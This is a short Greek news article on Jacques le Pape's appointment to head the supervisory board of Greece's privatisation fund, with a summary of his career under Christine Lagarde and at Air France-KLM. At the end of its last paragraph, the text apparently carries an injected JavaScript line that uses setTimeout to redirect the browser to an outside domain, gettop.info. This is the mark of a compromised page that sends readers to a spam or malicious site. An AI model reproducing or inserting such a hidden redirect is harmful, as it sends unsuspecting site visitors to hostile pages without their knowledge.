Ο Ζακ Λε Παπ επικεφαλής του Εποπτικού Συμβουλίου του υπερταμείου

0
9

 

Ο Ζακ λε Παπ (Jacques le Pape), τέθηκε επικεφαλής του Εποπτικού Συμβουλίου για τις ελληνικές αποκρατικοποιήσεις.

Πρόκειται για έναν έμπειρο τεχνοκράτη ο οποίος ήταν στενός συνεργάτης της Κριστίν Λαγκάρντ όταν η τελευταία ήταν υπουργός Οικονομικών της Γαλλίας.

Ποιος είναι ο επικεφαλής του υπερταμείου

Ο Γάλλος αξιωματούχος, λάτρης των τεχνών και της όπερας, δούλεψε για ένα διάστημα ως αναπληρωτής διευθυντής στο γραφείο της Κριστίν Λαγκάρντ, στο Μπερσί, την εποχή που η νύν διευθύντρια του Διεθνούς Νομισματικού Ταμείου, ήταν υπουργός Οικονομικών της Γαλλίας.

Έχει δουλέψει στο πλευρό επίσης των υπουργών Δικαιοσύνης και Μεταφορών, ενώ επί τρία χρόνια ήταν γενικός γραμματέας της αεροπορικής εταιρίας Air France-KLM, από την οποία έφυγε φέτος το καλοκαίρι.

Όπως επικαλείται η Le Figaro, οι ικανότητες του le Pape έχουν αναγνωρισθεί ήδη από τα χρόνια που δούλευε στο υπουργείο Οικονομικών και ως εκ τούτου, η εμπειρία του τόσο στον δημόσιο, όσο και στον ιδιωτικό τομέα, τον καθιστούν έναν ιδανικό υποψήφιο για την προεδρία του εποπτικού συμβουλίου για τις ελληνικές ιδιωτικοποιήσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here